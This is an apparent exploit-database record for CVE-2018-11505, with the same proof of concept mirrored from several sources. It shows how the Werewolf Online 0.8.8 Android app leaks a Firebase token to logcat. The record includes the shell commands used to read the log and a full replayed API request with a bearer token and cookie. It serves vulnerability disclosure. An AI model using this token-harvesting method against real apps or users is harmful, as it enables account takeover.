ID 1337DAY-ID-30479
Type zdt
Reporter ManhNho
Modified 2018-05-29T00:00:00
Description
Exploit for Android platform in category local exploits
# Exploit Title: Werewolf Online 0.8.8 - Insecure Logging
# Software Link:
https://play.google.com/store/apps/details?id=com.werewolfapps.online
# Download Link:
https://apkpure.com/werewolf-online-unreleased/com.werewolfapps.online/download?from=details
# Exploit Author: ManhNho
# Version: 0.8.8 Android App
# CVE: CVE-2018-11505
# Category: Mobile Apps
# Tested on: Android 4.4
---Description---
Many developers log information to the android log. Sometimes sensitive
data as well.
With output of logcat, Hacker can get "Firebase token" which used in PUT
request to /players/meAndCheckAppVersion
---PoC---
[email protected]:/ # ps | grep 'were'
u0_a72 9161 205 810364 172268 ffffffff b765ea23 S
com.werewolfapps.online
[email protected]:/ # logcat | grep -i '9161'
I/ActivityManager( 586): Start proc com.werewolfapps.online for activity
com.werewolfapps.online/.MainActivity: pid=9161 uid=10072 gids={50072,
3003, 1028, 1015}
I/MultiDex( 9161): VM with version 1.6.0 does not have multidex support
I/MultiDex( 9161): Installing application
...
D/RNFirebaseMessaging( 9161): Firebase token:
dygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8
D/RNFirebaseAuth( 9161): getToken/getIdToken
D/RNFirebaseAuth( 9161): getToken:onComplete:success
...
Request:
PUT /players/meAndCheckAppVersion HTTP/1.1
authorization: Bearer
eyJhbGciOiJSUzI1NiIsImtpZCI6IjEyMDUwYzMxN2ExMjJlZDhlMWZlODdkN2FhZTdlMzk3OTBmNmMwYjQifQ.eyJpc3MiOiJodHRwczovL3NlY3VyZXRva2VuLmdvb2dsZS5jb20vd2VyZXdvbGYtb25saW5lLTE5MTgxMiIsImF1ZCI6IndlcmV3b2xmLW9ubGluZS0xOTE4MTIiLCJhdXRoX3RpbWUiOjE1MjcxMzU0MTUsInVzZXJfaWQiOiIzNUxUT2pGWGw4Tk1DMklURDZlc1VUdVZ0RDgyIiwic3ViIjoiMzVMVE9qRlhsOE5NQzJJVEQ2ZXNVVHVWdEQ4MiIsImlhdCI6MTUyNzEzNTQxNSwiZXhwIjoxNTI3MTM5MDE1LCJlbWFpbCI6IndlcmVAMGlscy5vcmciLCJlbWFpbF92ZXJpZmllZCI6ZmFsc2UsImZpcmViYXNlIjp7ImlkZW50aXRpZXMiOnsiZW1haWwiOlsid2VyZUAwaWxzLm9yZyJdfSwic2lnbl9pbl9wcm92aWRlciI6InBhc3N3b3JkIn19.dRcMrVgnOI0VlVMTinv_UitmNZ3Lx6MxWQkPbxrLtj4xNI-5TmqL-oMHA3M4wWxt6gCtvNl9aO10WzhHHaN5wSJ7cnuUkEJGNUmA5PUcQTR7-NJ8i28C_x7fkqbQYqr0LFJSNxfa3BNb6B8qRNPmNjf_k3KoarRtp2eIxXbY_2Zf9S9-E8qBeyMM5waBrc3KHhxP8fIkxmDQOcTi83YioD0B9lmb8pqzu2kHARhySDIRLxHehujSMbOBnwEdSWNdYXv3G0r9SSJqREjyjv-xYqMzmDYElQ71LcanaoKeHmyyEDnuKyctkyvOOKUARV5QF1eMvvS2jQXlHQUIr2slHw
Content-Type: application/json; charset=utf-8
Content-Length: 207
Host: api-core.werewolf-apps.com
Connection: close
Accept-Encoding: gzip, deflate
Cookie:
AWSELB=896D69710664CD95B9C2256646A1D3D31F91AA414E0FCA5064E93F2745A17C7AAAF7C2EDA090955CDC20408E213D8C06ACC71A484F0BB3CDD1FB3D4FADD3439C18EF311AB3
User-Agent: okhttp/3.6.0
{"versionNumber":48,"platform":"android","fcmToken":"dygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8"}
---References---
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11505
https://pastebin.com/NtPn3jB8
# 0day.today [2018-05-29] #
{"lastseen": "2018-05-30T00:19:03", "references": [], "description": "Exploit for Android platform in category local exploits", "edition": 1, "reporter": "ManhNho", "published": "2018-05-29T00:00:00", "title": "Werewolf Online 0.8.8 - Information Disclosure Vulnerability", "type": "zdt", "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2018-05-30T00:19:03", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-11505"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147955"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E74B36224D5AA9D69537F16F1DA6EA84"]}, {"type": "exploitdb", "idList": ["EDB-ID:44776"]}], "modified": "2018-05-30T00:19:03", "rev": 2}, "vulnersScore": 5.5}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11505"], "modified": "2018-05-29T00:00:00", "id": "1337DAY-ID-30479", "href": "https://0day.today/exploit/description/30479", "viewCount": 18, "sourceData": "# Exploit Title: Werewolf Online 0.8.8 - Insecure Logging\r\n# Software Link:\r\nhttps://play.google.com/store/apps/details?id=com.werewolfapps.online\r\n# Download Link:\r\nhttps://apkpure.com/werewolf-online-unreleased/com.werewolfapps.online/download?from=details\r\n# Exploit Author: ManhNho\r\n# Version: 0.8.8 Android App\r\n# CVE: CVE-2018-11505\r\n# Category: Mobile Apps\r\n# Tested on: Android 4.4\r\n \r\n---Description---\r\n \r\nMany developers log information to the android log. Sometimes sensitive\r\ndata as well.\r\nWith output of logcat, Hacker can get \"Firebase token\" which used in PUT\r\nrequest to /players/meAndCheckAppVersion\r\n \r\n---PoC---\r\n \r\n[email\u00a0protected]:/ # ps | grep 'were'\r\nu0_a72 9161 205 810364 172268 ffffffff b765ea23 S\r\ncom.werewolfapps.online\r\n[email\u00a0protected]:/ # logcat | grep -i '9161'\r\nI/ActivityManager( 586): Start proc com.werewolfapps.online for activity\r\ncom.werewolfapps.online/.MainActivity: pid=9161 uid=10072 gids={50072,\r\n3003, 1028, 1015}\r\nI/MultiDex( 9161): VM with version 1.6.0 does not have multidex support\r\nI/MultiDex( 9161): Installing application\r\n...\r\nD/RNFirebaseMessaging( 9161): Firebase token:\r\ndygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8\r\nD/RNFirebaseAuth( 9161): getToken/getIdToken\r\nD/RNFirebaseAuth( 9161): getToken:onComplete:success\r\n...\r\n \r\nRequest:\r\n \r\nPUT /players/meAndCheckAppVersion HTTP/1.1\r\nauthorization: Bearer\r\neyJhbGciOiJSUzI1NiIsImtpZCI6IjEyMDUwYzMxN2ExMjJlZDhlMWZlODdkN2FhZTdlMzk3OTBmNmMwYjQifQ.eyJpc3MiOiJodHRwczovL3NlY3VyZXRva2VuLmdvb2dsZS5jb20vd2VyZXdvbGYtb25saW5lLTE5MTgxMiIsImF1ZCI6IndlcmV3b2xmLW9ubGluZS0xOTE4MTIiLCJhdXRoX3RpbWUiOjE1MjcxMzU0MTUsInVzZXJfaWQiOiIzNUxUT2pGWGw4Tk1DMklURDZlc1VUdVZ0RDgyIiwic3ViIjoiMzVMVE9qRlhsOE5NQzJJVEQ2ZXNVVHVWdEQ4MiIsImlhdCI6MTUyNzEzNTQxNSwiZXhwIjoxNTI3MTM5MDE1LCJlbWFpbCI6IndlcmVAMGlscy5vcmciLCJlbWFpbF92ZXJpZmllZCI6ZmFsc2UsImZpcmViYXNlIjp7ImlkZW50aXRpZXMiOnsiZW1haWwiOlsid2VyZUAwaWxzLm9yZyJdfSwic2lnbl9pbl9wcm92aWRlciI6InBhc3N3b3JkIn19.dRcMrVgnOI0VlVMTinv_UitmNZ3Lx6MxWQkPbxrLtj4xNI-5TmqL-oMHA3M4wWxt6gCtvNl9aO10WzhHHaN5wSJ7cnuUkEJGNUmA5PUcQTR7-NJ8i28C_x7fkqbQYqr0LFJSNxfa3BNb6B8qRNPmNjf_k3KoarRtp2eIxXbY_2Zf9S9-E8qBeyMM5waBrc3KHhxP8fIkxmDQOcTi83YioD0B9lmb8pqzu2kHARhySDIRLxHehujSMbOBnwEdSWNdYXv3G0r9SSJqREjyjv-xYqMzmDYElQ71LcanaoKeHmyyEDnuKyctkyvOOKUARV5QF1eMvvS2jQXlHQUIr2slHw\r\nContent-Type: application/json; charset=utf-8\r\nContent-Length: 207\r\nHost: api-core.werewolf-apps.com\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\nCookie:\r\nAWSELB=896D69710664CD95B9C2256646A1D3D31F91AA414E0FCA5064E93F2745A17C7AAAF7C2EDA090955CDC20408E213D8C06ACC71A484F0BB3CDD1FB3D4FADD3439C18EF311AB3\r\nUser-Agent: okhttp/3.6.0\r\n \r\n{\"versionNumber\":48,\"platform\":\"android\",\"fcmToken\":\"dygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8\"}\r\n \r\n---References---\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11505\r\nhttps://pastebin.com/NtPn3jB8\n\n# 0day.today [2018-05-29] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30479"}
{"cve": [{"lastseen": "2020-10-03T13:20:10", "description": "The Werewolf Online application 0.8.8 for Android allows attackers to discover the Firebase token by reading logcat output.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-05-26T22:29:00", "title": "CVE-2018-11505", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11505"], "modified": "2018-07-09T12:12:00", "cpe": ["cpe:/a:werewolf_online_project:werewolf_online:0.8.8"], "id": "CVE-2018-11505", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11505", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:werewolf_online_project:werewolf_online:0.8.8:*:*:*:*:android:*:*"]}], "exploitdb": [{"lastseen": "2018-05-28T00:31:03", "description": "Werewolf Online 0.8.8 - Information Disclosure. CVE-2018-11505. Local exploit for Android platform", "published": "2018-05-27T00:00:00", "type": "exploitdb", "title": "Werewolf Online 0.8.8 - Information Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11505"], "modified": "2018-05-27T00:00:00", "id": "EDB-ID:44776", "href": "https://www.exploit-db.com/exploits/44776/", "sourceData": "# Exploit Title: Werewolf Online 0.8.8 - Insecure Logging\r\n# Date: 2018-05-24\r\n# Software Link:\r\nhttps://play.google.com/store/apps/details?id=com.werewolfapps.online\r\n# Download Link:\r\nhttps://apkpure.com/werewolf-online-unreleased/com.werewolfapps.online/download?from=details\r\n# Exploit Author: ManhNho\r\n# Version: 0.8.8 Android App\r\n# CVE: CVE-2018-11505\r\n# Category: Mobile Apps\r\n# Tested on: Android 4.4\r\n\r\n---Description---\r\n\r\nMany developers log information to the android log. Sometimes sensitive\r\ndata as well.\r\nWith output of logcat, Hacker can get \"Firebase token\" which used in PUT\r\nrequest to /players/meAndCheckAppVersion\r\n\r\n---PoC---\r\n\r\nroot@vbox86p:/ # ps | grep 'were'\r\nu0_a72 9161 205 810364 172268 ffffffff b765ea23 S\r\ncom.werewolfapps.online\r\nroot@vbox86p:/ # logcat | grep -i '9161'\r\nI/ActivityManager( 586): Start proc com.werewolfapps.online for activity\r\ncom.werewolfapps.online/.MainActivity: pid=9161 uid=10072 gids={50072,\r\n3003, 1028, 1015}\r\nI/MultiDex( 9161): VM with version 1.6.0 does not have multidex support\r\nI/MultiDex( 9161): Installing application\r\n...\r\nD/RNFirebaseMessaging( 9161): Firebase token:\r\ndygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8\r\nD/RNFirebaseAuth( 9161): getToken/getIdToken\r\nD/RNFirebaseAuth( 9161): getToken:onComplete:success\r\n...\r\n\r\nRequest:\r\n\r\nPUT /players/meAndCheckAppVersion HTTP/1.1\r\nauthorization: Bearer\r\neyJhbGciOiJSUzI1NiIsImtpZCI6IjEyMDUwYzMxN2ExMjJlZDhlMWZlODdkN2FhZTdlMzk3OTBmNmMwYjQifQ.eyJpc3MiOiJodHRwczovL3NlY3VyZXRva2VuLmdvb2dsZS5jb20vd2VyZXdvbGYtb25saW5lLTE5MTgxMiIsImF1ZCI6IndlcmV3b2xmLW9ubGluZS0xOTE4MTIiLCJhdXRoX3RpbWUiOjE1MjcxMzU0MTUsInVzZXJfaWQiOiIzNUxUT2pGWGw4Tk1DMklURDZlc1VUdVZ0RDgyIiwic3ViIjoiMzVMVE9qRlhsOE5NQzJJVEQ2ZXNVVHVWdEQ4MiIsImlhdCI6MTUyNzEzNTQxNSwiZXhwIjoxNTI3MTM5MDE1LCJlbWFpbCI6IndlcmVAMGlscy5vcmciLCJlbWFpbF92ZXJpZmllZCI6ZmFsc2UsImZpcmViYXNlIjp7ImlkZW50aXRpZXMiOnsiZW1haWwiOlsid2VyZUAwaWxzLm9yZyJdfSwic2lnbl9pbl9wcm92aWRlciI6InBhc3N3b3JkIn19.dRcMrVgnOI0VlVMTinv_UitmNZ3Lx6MxWQkPbxrLtj4xNI-5TmqL-oMHA3M4wWxt6gCtvNl9aO10WzhHHaN5wSJ7cnuUkEJGNUmA5PUcQTR7-NJ8i28C_x7fkqbQYqr0LFJSNxfa3BNb6B8qRNPmNjf_k3KoarRtp2eIxXbY_2Zf9S9-E8qBeyMM5waBrc3KHhxP8fIkxmDQOcTi83YioD0B9lmb8pqzu2kHARhySDIRLxHehujSMbOBnwEdSWNdYXv3G0r9SSJqREjyjv-xYqMzmDYElQ71LcanaoKeHmyyEDnuKyctkyvOOKUARV5QF1eMvvS2jQXlHQUIr2slHw\r\nContent-Type: application/json; charset=utf-8\r\nContent-Length: 207\r\nHost: api-core.werewolf-apps.com\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\nCookie:\r\nAWSELB=896D69710664CD95B9C2256646A1D3D31F91AA414E0FCA5064E93F2745A17C7AAAF7C2EDA090955CDC20408E213D8C06ACC71A484F0BB3CDD1FB3D4FADD3439C18EF311AB3\r\nUser-Agent: okhttp/3.6.0\r\n\r\n{\"versionNumber\":48,\"platform\":\"android\",\"fcmToken\":\"dygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8\"}\r\n\r\n---References---\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11505\r\nhttps://pastebin.com/NtPn3jB8", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44776/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:56", "description": "\nWerewolf Online 0.8.8 - Information Disclosure", "edition": 1, "published": "2018-05-27T00:00:00", "title": "Werewolf Online 0.8.8 - Information Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11505"], "modified": "2018-05-27T00:00:00", "id": "EXPLOITPACK:E74B36224D5AA9D69537F16F1DA6EA84", "href": "", "sourceData": "# Exploit Title: Werewolf Online 0.8.8 - Insecure Logging\n# Date: 2018-05-24\n# Software Link:\nhttps://play.google.com/store/apps/details?id=com.werewolfapps.online\n# Download Link:\nhttps://apkpure.com/werewolf-online-unreleased/com.werewolfapps.online/download?from=details\n# Exploit Author: ManhNho\n# Version: 0.8.8 Android App\n# CVE: CVE-2018-11505\n# Category: Mobile Apps\n# Tested on: Android 4.4\n\n---Description---\n\nMany developers log information to the android log. Sometimes sensitive\ndata as well.\nWith output of logcat, Hacker can get \"Firebase token\" which used in PUT\nrequest to /players/meAndCheckAppVersion\n\n---PoC---\n\nroot@vbox86p:/ # ps | grep 'were'\nu0_a72 9161 205 810364 172268 ffffffff b765ea23 S\ncom.werewolfapps.online\nroot@vbox86p:/ # logcat | grep -i '9161'\nI/ActivityManager( 586): Start proc com.werewolfapps.online for activity\ncom.werewolfapps.online/.MainActivity: pid=9161 uid=10072 gids={50072,\n3003, 1028, 1015}\nI/MultiDex( 9161): VM with version 1.6.0 does not have multidex support\nI/MultiDex( 9161): Installing application\n...\nD/RNFirebaseMessaging( 9161): Firebase token:\ndygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8\nD/RNFirebaseAuth( 9161): getToken/getIdToken\nD/RNFirebaseAuth( 9161): getToken:onComplete:success\n...\n\nRequest:\n\nPUT /players/meAndCheckAppVersion HTTP/1.1\nauthorization: Bearer\neyJhbGciOiJSUzI1NiIsImtpZCI6IjEyMDUwYzMxN2ExMjJlZDhlMWZlODdkN2FhZTdlMzk3OTBmNmMwYjQifQ.eyJpc3MiOiJodHRwczovL3NlY3VyZXRva2VuLmdvb2dsZS5jb20vd2VyZXdvbGYtb25saW5lLTE5MTgxMiIsImF1ZCI6IndlcmV3b2xmLW9ubGluZS0xOTE4MTIiLCJhdXRoX3RpbWUiOjE1MjcxMzU0MTUsInVzZXJfaWQiOiIzNUxUT2pGWGw4Tk1DMklURDZlc1VUdVZ0RDgyIiwic3ViIjoiMzVMVE9qRlhsOE5NQzJJVEQ2ZXNVVHVWdEQ4MiIsImlhdCI6MTUyNzEzNTQxNSwiZXhwIjoxNTI3MTM5MDE1LCJlbWFpbCI6IndlcmVAMGlscy5vcmciLCJlbWFpbF92ZXJpZmllZCI6ZmFsc2UsImZpcmViYXNlIjp7ImlkZW50aXRpZXMiOnsiZW1haWwiOlsid2VyZUAwaWxzLm9yZyJdfSwic2lnbl9pbl9wcm92aWRlciI6InBhc3N3b3JkIn19.dRcMrVgnOI0VlVMTinv_UitmNZ3Lx6MxWQkPbxrLtj4xNI-5TmqL-oMHA3M4wWxt6gCtvNl9aO10WzhHHaN5wSJ7cnuUkEJGNUmA5PUcQTR7-NJ8i28C_x7fkqbQYqr0LFJSNxfa3BNb6B8qRNPmNjf_k3KoarRtp2eIxXbY_2Zf9S9-E8qBeyMM5waBrc3KHhxP8fIkxmDQOcTi83YioD0B9lmb8pqzu2kHARhySDIRLxHehujSMbOBnwEdSWNdYXv3G0r9SSJqREjyjv-xYqMzmDYElQ71LcanaoKeHmyyEDnuKyctkyvOOKUARV5QF1eMvvS2jQXlHQUIr2slHw\nContent-Type: application/json; charset=utf-8\nContent-Length: 207\nHost: api-core.werewolf-apps.com\nConnection: close\nAccept-Encoding: gzip, deflate\nCookie:\nAWSELB=896D69710664CD95B9C2256646A1D3D31F91AA414E0FCA5064E93F2745A17C7AAAF7C2EDA090955CDC20408E213D8C06ACC71A484F0BB3CDD1FB3D4FADD3439C18EF311AB3\nUser-Agent: okhttp/3.6.0\n\n{\"versionNumber\":48,\"platform\":\"android\",\"fcmToken\":\"dygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8\"}\n\n---References---\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11505\nhttps://pastebin.com/NtPn3jB8", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2018-05-31T09:29:47", "description": "", "published": "2018-05-27T00:00:00", "type": "packetstorm", "title": "Werewolf Online 0.8.8 Information Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11505"], "modified": "2018-05-27T00:00:00", "id": "PACKETSTORM:147955", "href": "https://packetstormsecurity.com/files/147955/Werewolf-Online-0.8.8-Information-Disclosure.html", "sourceData": "`# Exploit Title: Werewolf Online 0.8.8 - Insecure Logging \n# Date: 2018-05-24 \n# Software Link: \nhttps://play.google.com/store/apps/details?id=com.werewolfapps.online \n# Download Link: \nhttps://apkpure.com/werewolf-online-unreleased/com.werewolfapps.online/download?from=details \n# Exploit Author: ManhNho \n# Version: 0.8.8 Android App \n# CVE: CVE-2018-11505 \n# Category: Mobile Apps \n# Tested on: Android 4.4 \n \n---Description--- \n \nMany developers log information to the android log. Sometimes sensitive \ndata as well. \nWith output of logcat, Hacker can get \"Firebase token\" which used in PUT \nrequest to /players/meAndCheckAppVersion \n \n---PoC--- \n \nroot@vbox86p:/ # ps | grep 'were' \nu0_a72 9161 205 810364 172268 ffffffff b765ea23 S \ncom.werewolfapps.online \nroot@vbox86p:/ # logcat | grep -i '9161' \nI/ActivityManager( 586): Start proc com.werewolfapps.online for activity \ncom.werewolfapps.online/.MainActivity: pid=9161 uid=10072 gids={50072, \n3003, 1028, 1015} \nI/MultiDex( 9161): VM with version 1.6.0 does not have multidex support \nI/MultiDex( 9161): Installing application \n... \nD/RNFirebaseMessaging( 9161): Firebase token: \ndygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8 \nD/RNFirebaseAuth( 9161): getToken/getIdToken \nD/RNFirebaseAuth( 9161): getToken:onComplete:success \n... \n \nRequest: \n \nPUT /players/meAndCheckAppVersion HTTP/1.1 \nauthorization: Bearer \neyJhbGciOiJSUzI1NiIsImtpZCI6IjEyMDUwYzMxN2ExMjJlZDhlMWZlODdkN2FhZTdlMzk3OTBmNmMwYjQifQ.eyJpc3MiOiJodHRwczovL3NlY3VyZXRva2VuLmdvb2dsZS5jb20vd2VyZXdvbGYtb25saW5lLTE5MTgxMiIsImF1ZCI6IndlcmV3b2xmLW9ubGluZS0xOTE4MTIiLCJhdXRoX3RpbWUiOjE1MjcxMzU0MTUsInVzZXJfaWQiOiIzNUxUT2pGWGw4Tk1DMklURDZlc1VUdVZ0RDgyIiwic3ViIjoiMzVMVE9qRlhsOE5NQzJJVEQ2ZXNVVHVWdEQ4MiIsImlhdCI6MTUyNzEzNTQxNSwiZXhwIjoxNTI3MTM5MDE1LCJlbWFpbCI6IndlcmVAMGlscy5vcmciLCJlbWFpbF92ZXJpZmllZCI6ZmFsc2UsImZpcmViYXNlIjp7ImlkZW50aXRpZXMiOnsiZW1haWwiOlsid2VyZUAwaWxzLm9yZyJdfSwic2lnbl9pbl9wcm92aWRlciI6InBhc3N3b3JkIn19.dRcMrVgnOI0VlVMTinv_UitmNZ3Lx6MxWQkPbxrLtj4xNI-5TmqL-oMHA3M4wWxt6gCtvNl9aO10WzhHHaN5wSJ7cnuUkEJGNUmA5PUcQTR7-NJ8i28C_x7fkqbQYqr0LFJSNxfa3BNb6B8qRNPmNjf_k3KoarRtp2eIxXbY_2Zf9S9-E8qBeyMM5waBrc3KHhxP8fIkxmDQOcTi83YioD0B9lmb8pqzu2kHARhySDIRLxHehujSMbOBnwEdSWNdYXv3G0r9SSJqREjyjv-xYqMzmDYElQ71LcanaoKeHmyyEDnuKyctkyvOOKUARV5QF1eMvvS2jQXlHQUIr2slHw \nContent-Type: application/json; charset=utf-8 \nContent-Length: 207 \nHost: api-core.werewolf-apps.com \nConnection: close \nAccept-Encoding: gzip, deflate \nCookie: \nAWSELB=896D69710664CD95B9C2256646A1D3D31F91AA414E0FCA5064E93F2745A17C7AAAF7C2EDA090955CDC20408E213D8C06ACC71A484F0BB3CDD1FB3D4FADD3439C18EF311AB3 \nUser-Agent: okhttp/3.6.0 \n \n{\"versionNumber\":48,\"platform\":\"android\",\"fcmToken\":\"dygrGiSN49o:APA91bGGcHdzgU_2SnDydd8R7_Lbj6KT7miTpBatk_j8pLhxgH9vX00vV3CuIEnVkqgK9HC8H9pldMeaUeJ2_H3Dz4QiXE0b3mlQA0lXvry6cAMwS77Jv3m6NJyuGu_7Hn-3E1BPRRh8\"} \n \n---References--- \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11505 \nhttps://pastebin.com/NtPn3jB8 \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147955/werewolfonline088-disclose.txt"}]}
